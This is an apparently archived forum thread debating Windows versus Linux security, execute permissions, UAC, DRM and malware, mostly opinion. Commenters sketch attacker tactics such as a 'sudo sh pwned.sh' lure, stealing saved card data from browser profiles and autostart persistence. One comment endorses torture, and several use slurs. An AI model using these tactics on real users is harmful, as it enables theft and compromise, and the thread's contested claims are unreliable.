Meanwhile Jane comes back and wants to see which of her friends emailed her. That computer gets to add a cutesy minigame from an attachment, and another handy-dandy utility to remember her passwords, to its growing malware collection. While she's at it, she clicks on the www.i-pwn-u.ru link in another email to confirm her Paypal password again. She makes a mental note to whine about these idiots at Paypal who forget her password every other day and keep asking her to enter it again ;)
Little Timmy gets his computer time in the afternoon and gets his ass handed to him in multiplayer again. He googles for "counterstrike cheats" (or whatever game he's playing) and gets to some dodgy site where if you just download their keyboard and mouse driver, it can do a whole collection of FPS macros for you and make you play like a pro. (And also log the keypresses and send them back home, but they're not saying that.) Bweh-heh-heh, he'll show those guys in his clan who's teh uber-l337 FPS player.
Do you see any reason why in the same scenario they'd exercise caution about what they download in Linux, when they don't in Windows?
A polar bear is a cartesian bear after a coordinate transform.
Remember when people used to laugh when the subject of hardware infection came up?
Let's mark the dated - May 2010, now can we move on to securing our hardware [without draconian measures].
If we're able to get the HW manufacturers on board we might see something of a victory in the near future and be able to compute without interference.
This problem has never been taken seriously - and it's about time.
Subversionhack:
http://subversionhack.livejournal.com/
~hylas
Maybe in the past, but there are a lot of cases where DRM is still standing tough:
HD Satellite
PS3 -- one guy finally found one crack, but Sony has already not just patched this (and patched out Linux support in general), but put code in so they can force ROM upgrades as they see fit.
Zune WMA DRM. No, transcoding or analog hole doesn't count.
Blu-Ray -- AACS/BD+/BD-ROM mark. Still nothing even close to a break.
HDCP -- those cables are still secure. No such thing as a box you plug your HDMI cable into to decode stuff like you could with the old Macrovision VHS copy-protection.
Windows/Office activation. Yes, a crack may exist, but it gets flushed out every patch tuesday. Plus, I've yet to see a crack for Windows that is not a Trojan in disguise.
VAC/Warden bypass tools. The only utility that actually works with a game is MQ2 for everquest. Every other utility either results in a ban, or is a Trojan.
So, newer forms of DRM which bring in autoupdate mechanisms are winning the war.
Why don't you learn to read instead of thinking you're too cute for it, smackoff.
Oh, you're just adorable yourself getting all pissy like that! :-)
And for the record I really am just too cute for it. Cute Overload actually rejected me saying even they could not handle my cuteness. I am all that cute *and* a bag of chips.
Smackoff? That's a new one. Even Urban Dictionary provided no illumination. Hmm. A wrestling term perhaps? Is it the groovy new lingo kids are throwing down these days at the soda shoppe?
I don't generally post this kind of thing, but please mod the parent up. I cannot stress enough how false assumptions are generally bad in terms of security. Yes, Linux is being attacked (successfully), as is Mac OSX. The attacks on home routers are particularly heinous as most people do not update/upgrade the firmware ever, and more of it is based on common Linux underpinnings.
Michael J. Ryan - tracker1.info
Not quite. Windows *ASSUMES* executable status based on *EXTENSION* of a file. You can't execute a .TXT file, but rename it to .EXE and it will try to run it. The problem is association of .EXEs with a loader or something like that. It's a legacy system predating NTFS, going back to DOS days. And you can't really fix .EXEs by removing that association or nothing will run (including failed boot). That's was at least last time I checked it.
Tying executable and readable flags on NTFS together is an afterthought to allow this extension association for .exe work. Microsoft tries to avoid executing downloading software off of the network by flagging these files, but that is not ideal solution.
On Linux, the problem is not quite like on Windows but it is somewhat similar too. It is true that you cannot execute a downloaded executable without setting it +x (you can though, if user sets their umask :). But you sure can get a default program to open it. If there is a bug in teh default association (eg. .deb file, or some compressed file opened by archive software), then it is just as trivial to get remote code execution. So yes, you can't execute by extension, but you can still get remote code execution by exploiting a known vulnerability in a default application that opens a given mime type/file type.
There's another difference, and it's a doozy:
Once the user starts to suspect shenanigans, cleaning you out is as simple as (optionally) rescuing important user data, killing the user account, and rolling up a new one. Getting back to 'trustworthy system' is a lot simpler and more foolproof if you're confident that the hostile code was effectively contained by its user privs.
Of course, this isn't a dealbreaker: as you said, you can get plenty of evil done by just hanging out in the unprivileged account, and all bets are off if there are any local escalation exploits, which there pretty much always are. But ignoring these kinds of exploits, in principle, user privilege management is sufficient to keep the underlying system trustworthy, even if it can't protect the individual users from themselves.
DRM: Terminator crops for your mind!
UAC is light years ahead of the competition when it comes to being a nuissance.
UAC is no more of a nuisance than gksudo or whatever mechanism OSX uses to elevate privileges.
You're an idiot for even bringing it up.
Do have an actual argument, or are you just having a bad day?
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
If a hostile piece of code is able to create such a script in the first place, it is almost certainly also able to execute 'chmod' without asking you.
DRM: Terminator crops for your mind!
Collecting some ideas in this thread how about this. Not as a perfect solution, there isn't one, but it might cut zombies down greatly.
- Home routers by default are protected by a security company or the isp, automatically patched or re-imaged.
- A similar strategy is used to create a secure pc used only in the home for financial transactions.
- The router is used as a bidirectional filter, to keep the network clean (not letting zombies from inside the house get out) and to keep the pcs in the house clean (not letting dangerous looking things get through any ports, including scary looking email). So the router has to communicate proactively with the user and we need some standard client apps for that perhaps.
- Users are given an intrusion detection agent to run on their router (well the router downloads it automatically) and optionally on pcs/macs/linuxes that will detect port scans, attempts to break in via password scanning ftp and ssh services, and all known malware attacks. This will report to the ISP which can block those attackers from entering the ISP's network, or if inside the network then flag for examination. For example when I got my Mac a year ago I had to install things like fail2ban and this sort of thing is beyond the knowledge or understanding of most users.
- ISPs provide a way (manual entry via a website, and also via a standardized webservice that third party developers can target) for end-users to report IPs that are attempting attacks. The ISP can ban IPs outside the network that rack up a number of such attempts.
- There is a big danger of the ISP taking advantage of this power, and there need to be rules that ISPs can't do that. There is a big danger that by closing lots of ports it could break the net for protocols used by new applications, video conferencing, etc.
- Users therefore would be able to select among various providers of filters, allowing the market competition to reward the best providers, independent of the ISPs. No filtering at all (with all done by user) must be an option.
- Getting ISPs and third party providers of security profiles and security agents to work together and agree on standards is difficult. It could be assisted by a homeland security czar but the government would be too likely to abuse such a position, sneaking in security policies in lieu of court cases or legislation. So probably security consulting companies and manufacturers should discuss this at industry events and make an online venue to thrash out the ideas. Ideally users would pick the ISP with the best security record but apparently there is not enough competition in that market yet.
- Also ideally, statistics on attacks, infections and performance of the system as a whole would also be retrievable via webservices by third parties, in other words the entire system from device to end user to router to isp to corporate systems would form an interlocking, ad-hoc instrumented security system that is transparent enough to understand what is going on and what works, what doesn't.
- There is still the danger of unknown vulnerabilities, so there will need to be a big batch of canaries sprinkled about to try and detect them. Perhaps some of these things are already in place through actions of antivirus manufacturers and isps.
Unfortunately, what was a good part of town yesterday may be a bad one today. These changes happen relatively slowly in meatspace, but can happen more or less instantly in cyberspace. It's just not possible to ever be sure where the bad parts of town are. You could work on a whitelist of only trusted sites, but you'd end up blocking 95% of the Internet, most of which is harmless.
The main problem here is that the Internet is only MOSTLY harmless.
Mal-2
How is the Riemann zeta function like Trump rallies? Both have an endless number of trivial zeros.
You can install standalone debs and rpms, and they can have viruses. Will they get executable rights by default? (I'm on windows now.)
You lock up a tank by locking all the hatches internally but one, then putting a exterior padlock on that.
*picks up bic pen*
*walks toward nearest army base with M1 Abrams*
*Whistles to allay suspicion*
HA! I just wasted some of your bandwidth with a frivolous sig!
Simple telling people when they have an unusual mail load would probably do wonders to help.
Telling them when there traffic looks like a bot has taken it.
Getting them to go to gmail would help.
I have never had a virus I didn't put there on my PC. My family follows the simple directions for email and applications.
It's nice to see kids learning about this in schools now. Safe ways to use the computer will also go a long way to stop this.
It's really common sense stuff to reduce the risk. Looking for a solution that'a 100% fix will only cause snake oil salesmen to push placebo's and get us no where.
The Kruger Dunning explains most post on
DRM can always be defeated because the "attacker" is exactly the same as the user, and you're already giving them everything they need. That is a system which is fundamentally flawed. Real security is where you don't give the attacker your keys, passwords, etc.
So DRM relies on "security through obscurity", which is generally frowned on in security circles.
I'm drawing a distinction between the attackers, who most people assume are people anyway, and the classic case of PEBKAC. I can protect myself reasonably well from attackers, including human ones. I can't reasonably protect you from anyone if you're not willing to cooperate.
Don't thank God, thank a doctor!
HUH?
There is a fundamental difference where Windows fails and Unix works.
as a user you NEVER HAVE TO GIVE THEM ROOT ACCESS. Ever! I can as a user install software, make changes, Hell I can change Xorg settings and never touch /etc if I blow the hell out of things I only blow the hell out of it for me.
windows? I have to write to that abortion called the registry that is in the system folder., Oops install software? I need to write to system and system32. Look I got me a open door into the system...
Honestly, it's utter retardation that windows works the way it does. there should NEVER be a reason to write to the OS files. put software DLL files in /program files/system put software settings in a seperate registry. NOTHING should be able to go into /windows for any reason unless it's an OS update or a driver update and only done via Administrator.
Do not look at laser with remaining good eye.
There are several ways to make online banking completely secure.
Sorry, but you just lost all credibility right here. Anyone who claims that anything can be "completely secure" is either a) trying to sell something or b) clueless. You can say something is "more secure" or that something provides better security, but nothing, ever, will be "completely secure".
The
I don't see how it's much more difficult to get someone to download a .deb or .rpm file and install it versus getting them to download an .exe and install it. You're trying to create a distinction where none exists, and that gives people a false sense of security when running Linux.
Don't take life so seriously. No one makes it out alive.
As the CTO of a company named 'WhiteHat Security' you are, and I'm being mild here, completely unqualified for your job if you're just now learning to make that assumption. You do not belong in any group, conversation, publication, organization or even organizational unit that involves security. You are ignorant of the most basic premises of security.
Now ... to put it bluntly, you fucking suck at your job.
Anyone with half a clue assumes the client is compromised and has for as long as I can remember.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
However, if you assume that your client's machine is infected, no measure will secure your transaction. (There are keyloggers which do screenshots on mousclicks etc.)
Just sayin....
You're executing sh, not the script. While I agree that pedantically speaking that does show the original poster was incorrect, it's at least violating the spirit of the challenge.
If malware is spreading due to idiots receiving emails saying 'Hey Bob, download pwned.sh and then run 'sudo sh pwned.sh'' then the malware authors might as well just ask those people to mail them their bank passwords because they're dumb enough to do so.
I know this is a little FUD, but not exactly implausible. -Jeremiah Grossman
If a hostile piece of code is able to create such a script in the first place, it is almost certainly also able to execute 'chmod' without asking you.
Not when it's using a driveby download exploit like the ones that hit Safari in recent years; there's a huge difference between being able to download a non-executable pwned.sh to your Downloads directory and being able to execute it there... even if the user clicks on it, it won't run if it doesn't have execute permission.
The only ways to get a file executed on your PC which don't also require the user to manually add execute permission are through browser exploits, in which case you're already inside a process the user is running and they're owned anyway.
It is not only file permissions. Windows software has the habit of embebing executable code on everything, text files (even the ones you can't edit), images, movies, everything. Also Windows (and the acompaning software) keeps putting dialog boxes on the face of its users, and expect them to be able to discern when one of those dialogs is important to read, people simply can't do that.
That said, Windows is also easier to own without user intervention. It has more important open bugs all the time and has almost to variation within its installed base.
Rethinking email
Your argument makes sense in a highly abstract, academic universe in which all people are perfectly skilled, knowledgeable and well resourced.
I also addressed a universe in which people are reasonably skilled, knowledgeable, and well-resourced. I think that's a definite possibility. I hate to use a car analogy, but no one expects driving a car to be "easy" or "intuitive" or something you should be able to just pick up and do instantly. They expect to have to learn something. It only takes the tiniest bit of that kind of attitude to increase desktop security dramatically.
Really, it's not difficult to keep your system patched and avoid downloading random crap. 99% of the population can't seem to do that, I grant you, but it's not that far removed from reality.
The first problem is that we know it's possible to build DRM that is extremely hard to crack.
It only has to be cracked once -- particularly software DRM. One person (or team) figures out how to crack it, and distributes that over the Internet.
These systems have been partially defeated a handful of times and then promptly re-secured. It turns out that though you technically speaking "have the keys" they are buried under so much silicon wizardry that in practice you don't have them.
"Promptly re-secured" suggests that it's not the silicon alone.
I could also qualify this with, all DRM is theoretically crackable, and all DRM involving static media (audio and video) will be cracked, as we've seen. Executable stuff (games) is harder.
The second is that it's very questionable whether there is any such thing as a "completely secure system" as you describe. Your phrasing is vague so I'll assume you're talking about resistance against attackers who are physically remote.
Yes.
The trend has been that over time, bugs that were once thought to be un-exploitable have become exploitable.
We're talking about bugs, though. You're going to find this even more ludicrous, but there is nothing inherent in software that requires it to have bugs. The bugs are our fault.
Now, I'm not going to tell you that I can create flawless software, or that any human can, only that it's possible, whereas working DRM is not.
For instance at one time both heap and integer overflows were not deemed to be a security issue until techniques for reliably exploiting them were published.
And both heap and integer overflows are things which do not have to exist.
Likewise, it's only recently that implementors of software cryptography have started thinking about statistical side-channel attacks and many (most?) engineers are still unfamiliar with them.
This is harder, yes. However, these are mostly dealing with information sent over the wire, and none of it applies to keeping a single desktop PC secure, given that desktop PCs typically don't need remote access.
I am skeptical there are any perfectly undefeatable systems out there.
As am I.
However, to take "DRM can never work", and use that to conclude that "Security is impossible", is missing the point. It's a bit like noticing that homeopathy is bunk, and from that, concluding that medicine is impossible.
Don't thank God, thank a doctor!
And you sir, don't understand that the executable bit can be worked around ... pretty much instantly, with a basic shell script ... which itself doesn't have or need the executable bit.
Good job for thinking you have a clue, but I'll run any binary on your system in a heartbeat that I have a +r on regardless of its +x status.
let me give you a simple starting point, just past e this into your shell prompt as is ...
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
ugh, nice mangling slashdot ... it didn't look screwed up when I previewed it ...
echo #!/bin/sh > test.sh
echo echo Hello, I'm an idiot who really doesn't understand file permissions >> test.sh
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
If Linux had the market share of Windows, it would have as much, or nearly as much, malware.
Seriously, can we put this to rest? Compare the number of Linux servers and Windows servers on the web and tell me again that that argument holds water.
Who cares if you're not running as root if everything interesting is owned by the user's account?
If that were the case, you would be correct. Unfortunately, it isn't, and you aren't. When malware installed on a Windows machine can write to the registry and to DLL's in C:\Windows\system32, it becomes very, very difficult to remove such malware. By contrast, the one and only time I ever needed to clean up a compromised Linux machine, it was a simple matter of changing an Internet user's password (to fix the initial exploit -- a weak, compromised password) and deleting a copy of PHPShell that the hacker had uploaded into the compromised user's public_html directory. Since neither the compromised user account nor the web server daemon had write access to anything outside of /home/username or /var/www (i.e., binaries or libraries), it was orders of magnitude easier to clean up this particular Linux machine than any Windows machine I've ever had to disinfect.
If you can lock down a Windows box and keep it clean, more power to you. I have yet to see a Windows machine stay clean indefinitely, however, no matter how conscientious or skilled the admin. To be honest, whether Linux is inherently more secure (which I think it is) or is more secure simply because, as you say, Windows is more common and therefore, it is less profitable to write malware for Linux, I really don't care. What I know is my Linux boxes don't see the same kind of exploits Windows boxes regularly do, and until they do, I'll stick with Linux.
MCSE? No, sir...I don't do Windows. Yes, I am an idealist. What's your point?
So you want the Nannystate to fix this for you because you're too lazy to fix this yourself? Collectivist! We don't need your fascist-socialism here! Leave America if you hate it so much! [/sarcasm]
Actually, I'm a liberal, although in this case, I don't think we need any draconian laws or oversized bureaucracies to deal with this issue. Why? Because even though it would cost ISPs money to address this issue, infected computers on their network costs them money in the form of more traffic (they gotta pay for the pipes to the backbone after all). They therefore have a financial motive for dealing with their customers' infected computers, and some ISPs have in fact taken it upon themselves to warn users that they suspect have compromised computers. All on their own.
So I think it would only take a little nudge from the government to encourage the other ISPs to start doing something similar. Just stress to them that the extra traffic from infected computers is probably costing them money.
I'm with you here, except for this bit:
...even if the user clicks on it, it won't run if it doesn't have execute permission.
'Even if?' If these drive-by download exploits are only able to create pwned.sh, then I'm not sure what they could ever accomplish if the user didn't click.
If this exploit could instead be used to create a pwned.sh with the execute bit already set, could we then get that script to run without user help? Or are we still stuck waiting around for a curious moron to click it?
DRM: Terminator crops for your mind!
I understood your distinction. My response to you was tongue-in-cheek.
"while democracy seeks equality in liberty, socialism seeks equality in restraint and servitude." de Tocqueville
Oh, and look how fantastical I am at HTML.
DRM: Terminator crops for your mind!
Yes, and the grandparent's post was bogus or at least dated. A lot of severe malware tends to take advantage of bugs in programs like web browsers, pdf readers, or even native apis like the GDI exploits a couple years go. You don't need execute permissions, you just need to trick the user into opening the file (for reading) by an exploitable program.
As somewhat mentioned, the only real defense is something like SELinux (or AppArmor) and they are a pain to configure - far too much of a pain for most casual users.
(Program: Firefox was recently installed, please specify the directories and ports it is allowed to access)
You put an executable on a Windows system and it's immediately executable by anyone.
So can you in Linux, thats what "chmod +x" is for. And even when you use a noexec mount (which no desktop distri I now does), people can still just use one of the dozens of scripting languages that you find on every random Linux out there.
The only security advantage Linux has over Windows, is that on Linux (or at least the major distros) you have a central repository of all software. On Windows you don't. So on Windows even something simple as searching for a driver leads you across a ton of dubious webpages whoes authority you cannot verify, while on Linux stuff just works with what comes from the repository.
Of course every now and then you might not find what you are searching for in a repository, but these days that doesn't happen all to often, my /usr/local/ has been virtually empty for years.
The whole idea behind the first post is a false sense of security because, by default, umod doesn't include the execute permissions. If I'm an attacker and already have managed to write to your filesystem as you, it'd be trivial for me to chmod +x to my malicious file using utilities I can already execute, or even just run the commands without using a file. For example, I could run perl -e 'creatively packed malicious code' and be on my way.
Of course, I've been operating under the assumption that the attacker is creating and trying to run the file. Odds are, if the user downloaded and tried to execute the file, the lack of a default execute privilege isn't going to mysteriously save them. They're just going to run 'chmod +x SuparCoolCalendar' and run it again. Or, if it's a shell script, they're just going to do the same thing I did to run it without execute permissions if they're too lazy to chmod.
The point is, if the user is trying to execute something, they're going to execute it regardless of what your umod is set to.
many organizations, particularly in the financial services industry, have gotten to the point of assuming that their customers' desktops are compromised
Isn't that a good thing? If I were writing code that interacts with a system outside my control, I would assume the worst case scenario (compromised, packet sniffers, rootkits, etc.) and code as much as I can to be resilient to that.
Have financial institutions been running thus far under the assumption that their customer's computers aren't compromised?
Faith is a willingness to accept something w/o complete proof and to act on it. Reason allows you to correct that faith.
Ummm...the Internet is the bad part of town. Your Intranet is the only network you can really trust (and TFA puts doubt on that, even).
Just sayin'...
MCSE? No, sir...I don't do Windows. Yes, I am an idealist. What's your point?
The main problem is two fold. The software companies (i.e. all of them) have their own agenda, profit. Microsoft is probably the biggest culprit, but they are also the largest targeted OS. The second part are the consequences. If laws started making it very painful to be caught performing 'internet terrorism' than you would see a large fall in this types of crimes. Utilizing acids, a propane torch and a pair of vice grips would solve the problem overnight.
Umm... No. That doesn't work on Debian.
garyk@lappy:~/scripts$ echo #!/bin/bash >test2.sh
garyk@lappy:~/scripts$ echo whoami >> test2.sh /home/garyk/scripts/test2.sh: Permission denied
garyk@lappy:~/scripts$ test2.sh
bash:
garyk@lappy:~/scripts$ chmod +x test2.sh
garyk@lappy:~/scripts$ test2.sh
I can't help it that whatever distro you're running has bypassed basic Linux security decisions, but the distro I use has not.
"while democracy seeks equality in liberty, socialism seeks equality in restraint and servitude." de Tocqueville
You don't need gksudo unless your actually doing something "administrative" like changing system wide settings or installing system wide software.
No non administrative app should ever require root so if you didn't do something where you would otherwise expect to need gksudo you can just assume the prompt is fake.
The reason UAC needs to be so clever is that day to day tasks often cause it to activate and you need to be able to tell the difference.
Oops. I cut off the output from whoami after giving test2.sh execute permissions, but it did run then.
"while democracy seeks equality in liberty, socialism seeks equality in restraint and servitude." de Tocqueville
And seatbelts don't save your life in every situation, so nobody should wear them.
It is difficult to get a man to understand something when his job depends on not understanding it.
It's not about profit, it's that windows gives people administrator by default (and you can still enable it in Windows 7).
It is now two major Windows releases since the standard user was Administrator - and even in prior versions it was only true of Windows machines not joined to a Domain.
On top of that, typical malware does not need elevated privileges to do its work.
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
IE rarely asks for elevated privileges (can't even remember the last time I saw it). There is no option to "grant forever" in UAC.
The rest of the security is no different in most scenarios whether windows or linux. However, on this front, UAC doesn't do squat (especially when you can get around UAC).
UAC does the same thing gksudo in Linux distros do.
Once the user starts to suspect shenanigans, cleaning you out is as simple as (optionally) rescuing important user data, killing the user account, and rolling up a new one. Getting back to 'trustworthy system' is a lot simpler and more foolproof if you're confident that the hostile code was effectively contained by its user privs.
Which you never can be.
Otherwise, the user himself must add the execute permission to the file.
Users are happy to open password-protected zipfiles to get at the dancing bunnies inside. Are you seriously try to suggest "chmod +x boobies.sh", or "perl bunnies.pl" is some sort of meaningful security barrier ?
Test it for yourself. Write a script on a Linux machine and try to execute it without adding execute permissions. You can't do it. Try that on Windows and it works. No changes necessary. That's a huge difference in security.
No. It's insignificant and irrelevant.
We're number one! Windows is number 1.25! SUCK IT BALLMER!
You can rag on Windows and admin privileges all you want. All I can say is:
login as: root
root@yourhost.foo's password:*******
Spare me the, "OMG USE SUDOZ LOLZ" because that's a load of crap in the face of the poor argument that 'UAC' not doing squat.
As for the rest, go deal with commodity hosting sometime. The number of infected Linux systems out there is legion. And it'll continue to be so, because in the end, Linux has the same problem as Windows: Package management sucks. It doesn't matter what distribution you choose, sooner or later, users will need to install something that's a) not in their distribution's package management system or b) is included but horribly out of date or simply broken.
When that happens, they're going to scream, curse, drink heavily, install the package the old fashioned way (probably involving several megatons of mail to mailing lists/posts to forums to figure out how) and then, once it's working - promptly forget about it. It will then be left to rot, and any security patches/etc. coming out for $SOFTWARE will be ignored.
The differences in how to gain administrator access do affect up front security requirements.
You're missing the point -- administrator access isn't needed to compromise a system. If I can harvest someone's saved credit card data from ~/.mozilla or %PROFILE%\ApplicationData\mozilla, and while I'm there drop a script into ~/.kde/autostart or %PROFILE%...\StartMenu\Startup , why do I need root? Privileged permissions certainly let you extend the damage you're capable of -- but *any* access at all is the only requirement for compromising a system.
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
Konqueror is requesting admin permissions. Please enter your password. Way to go, giving worms and spyware admin access. This isn't a platform issue - the underlying model (from the user perspective) is the same: Trivial, everyday activities cause the user to be inundated with confirmation requests. The user gets trained to accept them without thinking -- whether it be by clicking a button or entering a password. So when it matters, they're *still* going to give permission.
Maybe both systems need to take a closer look at what they're doing. Windows prompts you for installing new programs, for accessing certain folders in Explorer, and various other pointless things that you do in the normal course of interacting with your computer. Ubuntu does the exact same thing - except the range of things it prompts for is even bigger. Changing network settings. Configuring hardware. Installing security updates (unless that's changed in 10.04 - I'm still on 9.10). All of these things that you won't ever say no to, because you initiate them in the first place.
When presented with an obstacle such as a prompt, most users don't read it. They take whatever action is the quickest one to take in order to make it go away. The answer to this is not to put more prompts up -- because if you *do* have a scenario in which Something Bad is going to happen, the user is well-trained to just keep plowing through it.
as a user you NEVER HAVE TO GIVE THEM ROOT ACCESS. Ever!
How are you planning on patching your OS without root ? Running software that binds to privileged ports ? Add devices to the system that require drivers ? Partition and/or format an external drive ? Etc, etc.
windows? I have to write to that abortion called the registry that is in the system folder.,
You mean the transactional database with per-user permissions ?
Oops install software? I need to write to system and system32.
No, you don't. Certain applications might require it, but it's not an OS issue.
Look I got me a open door into the system...
No, you don't. Create and modify are different things.
Seriously, can we put this to rest? Compare the number of Linux servers and Windows servers on the web and tell me again that that argument holds water.
Can you provide the numbers so we can compare ?
Further, servers are not end user desktops. They represent two _distinctly_ different risk profiles.
I have yet to see a Windows machine stay clean indefinitely, however, no matter how conscientious or skilled the admin.
I've been running Windows NT (2k, XP, etc) on multiple home PCs for 15 years. I've never had a piece of malware on any system.
Isn't the iPhone environment the closest to this that we have in a mainstream computing environment?
Heh. It's easy; I've done it myself. In fact, it's easier than using Windows, which has the most difficult UI in the industry, especially since it's constantly changing.
By that implied standard, which UI is _not_ "constantly changing" ?
But that's all irrelevant, because computer security has absolutely nothing to do with sales. It's determined by ad budgets.
The single biggest factor in "security" (and I assume from your comment you are using the word in the context of outcomes, not capabilities) is end user behaviour. Nothing else even comes close.
Building them a secure system is more expensive than not bothering with security, and it wouldn't increase sales past the current 90%, so why should MS bother?
But now you're using "security" in a reference to capabilities. So, what security _capabilities_ are lacking in Windows, both compared to the alternatives and in an absolute sense ?
Well, several dialogs on Linux optionally remember the root password. Synaptic, e.g., has one like that on my Debian box. I don't think that should be an option, so *I* never select it. (Granted, Synaptic isn't the same as a browser, but it could authorize a new repository, and install software from it. Take a small bit of scripting, but it could easily turn a nearly harmless exploit into a massive one.)
Too many changes have been made to make using things easier without considering the security consequences. E.g., tar files shouldn't be able to unpack files with a "executable" marking. That should require a manually executed shell file...which itself wouldn't unpack with an executable marking.
But notice that this "security" causes a minimal decrease in usability. You've got to take an extra step to install the software. I.e., something equivalent to:
"su -c 'sh mark_executable.sh'" or "sh mark_executable.sh"
depending on the priviledges required, though one could wrap a nice graphic around that without problems.
But storing passwords needed for execution is dangerous. Generally browsers remembering logon passwords is ok, but this shouldn't be done where the site might be significant. E.g., a slashdot logon/password combo can reasonably be stored by the browser. Your bank's logon/password is much less reasonable. (I won't even do internet banking, and I won't use debit cards. And the credit cards that I use online have a strictly limited credit limit.)
Despite that I feel that Linux is much safer than MSWind. Some bad choices have been made, but not as many. And If I want to use the internet securely, I can do it from an account that only has access to its own files. So far I haven't felt it's worth the bother, but it's readily doable.
I think we've pushed this "anyone can grow up to be president" thing too far.
echo echo Hello World > test.sh && sh test.sh
Would that still work if the partition was mounted as noexec?
*sigh* back to work...
So, suppose I'm the business end of a botnet. What does administrator access give me?
Your botnet client runs on boot, and much more quietly than under a user account. Under a user account, you have to start on login, and end communication when he logs off. Plus, with admin you can open FW ports, install other services, etc.
Unfortunately, when you unpack a tarball, the files unpack with the execute permission bits set (if they were set originally). And unpacking a tarball is the kind of thing it's reasonable to do.
I'll grant that this doesn't automatically execute the software, but it does make it executable. Then just clicking on an misleading file image can execute it. (And who knows that that file labeled "index.html" might do? Though *that* security hole may have been fixed. It doesn't seem to autoexecute anymore.)
I think we've pushed this "anyone can grow up to be president" thing too far.
You're wrong in saying administrator access is the basic difference between Linux and Windows. The most basic difference is in default file permissions. Windows ties read and execute together by default. You put an executable on a Windows system and it's immediately executable by anyone. That is not true with Linux. Executables are only executable by default if a a system tool, such as apt-get, yum, etc... is used to install them. Otherwise, the user himself must add the execute permission to the file.
I set my system wide umask to 000 and leave it to my users (including root) to lock down each file. I feel it's more in the spirit of RMS's admin philosophy. I haven't had a problem yet. My real problem is with all of the "ls"es that keep getting copied into every directory.
There goes another one! Are they breeding?
Damn it!
So all a tank-jacker has to do is put a brick through the window?
You don't need gksudo unless your actually doing something "administrative" like changing system wide settings or installing system wide software.
Nor do you need UAC unless you're doing something administrative.
No non administrative app should ever require root so if you didn't do something where you would otherwise expect to need gksudo you can just assume the prompt is fake.
Of course. But Windows operates in an environment where millions of apps misbehave. This is the reality and so far all of the people who bash UAC are not living in the realm of reality. I'm still waiting for someone who thinks UAC sucks to propose user friendly alternative to UAC.
The reason UAC needs to be so clever is that day to day tasks often cause it to activate and you need to be able to tell the difference.
Day to day tasks - like what?? if you are talking about misbehaving programs that write to %programfiles%, then how the hell is UAC supposed to know that this is supposed to be a day to day task?
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
I've worked inside on things since windows 3.1
I've worked with security products over the same period.
I've worked with Users, and in terms of compliance, and in terms of business.
I've worked with and for and around vendors.
Today, we are multi generations of the base consumer OS later.
The real world security model is so broken as to be an actual joke.
The security models in use are also now so broken as to be an actual joke.
Application and vendor companies are still shipping products today, multi generations later in this consumer area that require the logged in user to run with administration rights when using the program.
Security products have been failing for several years. And there is no chance whatsoever that security products can mitigate and bulwark off computers against the fact that software is fundamentally flawed, but worse yet, globally end users are running the majority of applications, tools, utilties and processes with administrator rights.
Even with the onset of Vista and with Windows 7, the voluntary compliance in view of UAC is simply ignored. Most home users switch off and blithly click click click, and the smarter ones would be utterly ignored when reporting to vendors to have culpative changes made to end software. With no punitive action being faced there is very little to persuade vendors and software producers to actually secure and improve their programs, APIs, frameworks, and Features.
Security vendors rarely step forward to make demands in light of admin rights, - and their whole industry is based on the equivilent in Pharma terms - dragons penises and the maagical effects of it as a healing agent towards keeping clients secure.
Most security products are at best woefully inadaquate, and in many cases have no idea malware and foreign code is running wild on systems they are 'protecting'. Years ago, they should have been driving the use of admin rights on the desktop away. But again, with no punative penalty for failures, they can continue selling utterly flawed models and generations of products that are patently unable to do what they are supposedly designed to do.
I don't entirely blame them, but the failure to drive the admin rights issue is the fundamental flaw in this, along with faulty vendor products, and faulty third party software products.
Here are AdmV0rl0ns laws.
1. The model of software development has to change. And change fundamentally. For several decades - software has been built along very odd engineering lines. Companies are allowed almost a free hand in terms of punitive licensing, and in terms of licensing, and gain enormous protection from the state, and freedom of the state in terms of copyright and other protection.
In most cases, every single line of code written has been accompanied with a substantive 'If the world burns down because of this software, or because of anything this software does, then we cannot be held accountable, good luck.'.
This cannot continue. In the real world, no such engineering is acceptable. Bridges are not shoddy affairs put up and then handed over to the paying taxpayer, customer or business with an cast iron guarantee that the bridge builder is excempt from 'everything'.
Consumers don't buy a car, and then are forced by laws and licenses to sign over all their rights and if the wheels fly off the car, the maker gets exeption from all responsibility.
In terms of OS development, The vendor has to be brought to account, and it has to develop and security test APIs and function to a level where the wheels do not fly off. And where security becomes a functional demand. And if this change cannot be gained by voluntary method, then the law needs changing so punitive damages are available to those who suffer failures from software.
It has to be remembered, many of these companies make millions, perhaps even billions, and yet avoid any examination of their products actual safety and engineering. Windows XP and its subsequent service packs w
We`re all equal
The 70's called and they're offering timesharing again (although they are now calling it "cloud computing" as a new and improved name). Security was good, the core OS was secure and as a closed environment it wasn't prone to hackers. All you need is a TTY (preferably a ASR33), a dial up modem and you can call up your bank and get access to your account information.
The 60's have called have offered batch as an alternative.
For years, security experts, analysts and even users have been lamenting the state of *MS Windows* security. Viruses, spam, Trojans and rootkits have added up to create an ugly picture. But, the good news is that the MS Windows security battle may be over. The less-than-good news, however, is that we may have lost it. Jeremiah Grossman, CTO of WhiteHat Security, said Thursday that many organizations, particularly in the financial services industry, have gotten to the point of assuming that their customers' MS Windows desktops are compromised. And moving forward from that assumption, things don't get much prettier.
Wow, mono-culture turned out to be bad. Who'd a thunk it?
I call hogwash. How many Microsoft employees must be posting in this forum. The measure that matters is the real world. I've been working in a university I.T. dept, thats a LOT of machines spread amongst a huge breadth of user skill levels (our particular uni consists of roughly 40% OSX, 50% Windows (XP and 7) and 10% Fedora Linux (and yes, we do put end users on the Fedora boxes for classwork). I am yet to see a Linux or OSX machine get with a hijacked browser session.
I'd be very interested in a show of hands. Linux does have a decent share of the server market, and systems running it do get exploited (but my bet is that its very predominantly from exploits in sloppy PHP web apps and the like). But aside from that, how many of you out there have *ever* had malware get on to your Linux desktop and start hijacking your browser? My bet is very nearly zero. Windows is as secure as anything else? You may like to think that in principle it could be, but the experimental evidence strongly disagrees.
Censorship is the opposite of education. If neo-darwinism were defensible, people would not need to try and censor ID.
